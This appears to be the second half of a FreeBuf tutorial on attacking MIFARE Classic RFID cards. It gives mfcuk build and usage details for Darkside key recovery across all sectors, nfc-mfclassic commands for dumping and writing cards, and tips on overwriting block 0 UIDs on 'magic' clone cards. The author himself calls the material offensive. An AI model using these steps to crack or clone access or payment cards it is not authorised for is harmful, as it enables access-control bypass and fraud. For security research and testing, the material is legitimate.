Official GitHub: https://github.com/nfc-tools/mfcuk
mfcuk (not mfuck!!!) implements the Darkside attack described above.
git clone https://github.com/nfc-tools/mfcuk.git
cd mfcuk
autoreconf -vis
./configure
make
sudo make install
Usage:
mfcuk - 0.3.8
Mifare Classic DarkSide Key Recovery Tool - 0.3
by Andrei Costin, zveriu@gmail.com, http://andreicostin.com
Usage:
-C - require explicit connection to the reader. Without this option, the connection is not made and recovery will not occur
-i mifare.dmp - load input mifare_classic_tag type dump
-I mifare_ext.dmp - load input extended dump specific to this tool, has several more fields on top of mifare_classic_tag type dump
-o mifare.dmp - output the resulting mifare_classic_tag dump to a given file
-O mifare_ext.dmp - output the resulting extended dump to a given file
-V sector[:A/B/any_other_alphanum[:fullkey]] - verify key for specified sector, -1 means all sectors
After first semicolon key-type can specified: A verifies only keyA, B verifies only keyB, anything else verifies both keys
After second semicolon full 12 hex-digits key can specified - this key will override any loaded dump key for the given sector(s) and key-type(s)
-R sector[:A/B/any_other_alphanum] - recover key for sector, -1 means all sectors.
After first semicolon key-type can specified: A recovers only keyA, B recovers only keyB, anything else recovers both keys
-U UID - force specific UID. If a dump was loaded with -i, -U will overwrite the in the memory where dump was loaded
-M tagtype - force specific tagtype. 8 is 1K, 24 is 4K, 32 is DESFire
-D - for sectors and key-types marked for verification, in first place use default keys to verify (maybe you are lucky)
-d key - specifies additional full 12 hex-digits default key to be checked. Multiple -d options can be used for more additional keys
-s - milliseconds to sleep for SLEEP_AT_FIELD_OFF (Default: 10 ms)
-S - milliseconds to sleep for SLEEP_AFTER_FIELD_ON (Default: 50 ms)
-P hex_literals_separated - try to recover the key from a conversation sniffed with Proxmark3 (mifarecrack.c based). Accepts several options:
Concatenated string in hex literal format of form uid:tag_chal:nr_enc:reader_resp:tag_resp
Example -P 0x5c72325e:0x50829cd6:0xb8671f76:0xe00eefc9:0x4888964f would find key FFFFFFFFFFFF
-p proxmark3_full.log - tries to parse the log file on it’s own (mifarecrack.py based), get the values for option -P and invoke it
-F - tries to fingerprint the input dump (-i) against known cards’ data format
-v verbose_level - verbose level (default is O)
Usage examples:
Recove all keys from all sectors:
mfcuk -C -R -1
Recove the sector #0 key with 250 ms for all delays (delays could give more results):
mfcuk -C -R 0 -s 250 -S 250
[mfcuk]
For reasons of space it is not covered in detail here. Expect it to be slow (minutes to hours, with the card held still on the antenna); the -s/-S delays in the usage above are the knobs to try when it gets nowhere. Neither mfcuk nor mfoc works on cards whose PRNG has been fixed (newer MIFARE Classic EV1 / "hardened" chips): mfoc then reports that the card is not vulnerable to the nested attack, and such cards need the hardnested attack on a Proxmark3 instead.
Writing cards
Writing Mifare Classic cards is done directly with nfc-mfclassic. The two common sizes are the 1K "M1" (S50) and the 4K (S70).
Usage:
nfc-mfclassic
Usage: nfc-mfclassic f|r|R|w|W a|b <dump.mfd> [<keys.mfd> [f]]
  f|r|R|w|W     - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
                  format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default
                  unlocked read does not require authentication and will reveal A and B keys
                  note that unlocked write will attempt to overwrite block 0 including UID
                  unlocking only works with special Mifare 1K cards (Chinese clones)
  a|A|b|B       - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
  <dump.mfd>    - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
  <keys.mfd>    - MiFare Dump (MFD) that contain the keys (optional)
  f             - Force using the keyfile even if UID does not match (optional)
Examples:
  Read card to file, using key A:
    nfc-mfclassic r a mycard.mfd
  Write file to blank card, using key A:
    nfc-mfclassic w a mycard.mfd
  Write new data and/or keys to previously written card, using key A:
    nfc-mfclassic w a newdata.mfd mycard.mfd
  Format/wipe card (note two passes required to ensure writes for all ACL cases):
    nfc-mfclassic f A dummy.mfd keyfile.mfd f
    nfc-mfclassic f B dummy.mfd keyfile.mfd f
[nfc-mfclassic]
One extra note: the UID area (block 0) of a genuine M1 card is read-only. Some vendors (the Chinese "magic card" makers) ignore the spec and make block 0 writable through a backdoor command, and that is what the W (unlocked write) mode uses to force a new UID. If you do this, keep byte 4 of block 0 consistent: it is the BCC, the XOR of the four UID bytes, and a clone with a wrong BCC will not even get through anticollision.
a|b selects whether the write authenticates with key A or key B (either works on a card still in transport configuration, ff 07 80 69); whether a given key is allowed to write a given block is decided by the sector's access bits, which is Mifare protocol territory the reader can look up on their own.
Closing remarks
The content of this article is offensive in nature; do not use it for illegal purposes! If you make the news with it, do not come looking for me.
About the PN532
The PN532 is documented as supporting Ultralight cards, yet mine never managed to read one, so I asked about it in elechouse's GitHub issues. They state that the PN532 boards they produce read practically every card that speaks the NFC protocols, but the Taobao knock-offs seem to have had some functions cut. 1K and 4K cards work fine on mine in any case.
A trick on the phone
On an NFC-capable Android phone there is an app called MIFARE Classic Tool that can read, write and dump cards, provided you have the right keys! Crack the keys on the Raspberry Pi, add them to the app's key file, and the phone can then read and write the card. What for, you can guess. One caveat: the phone's NFC chip has to support MIFARE Classic at all, and a number of handsets (Broadcom chipsets in particular) do not; the app tells you on startup if yours is one of them.
Google Play link: https://play.google.com/store/apps/details?id=de.syss.MifareClassicTool&hl=zh (a VPN is needed from mainland China)
* Original author: ya0guang. This article is part of FreeBuf's original-content reward programme; reproduction without permission is prohibited.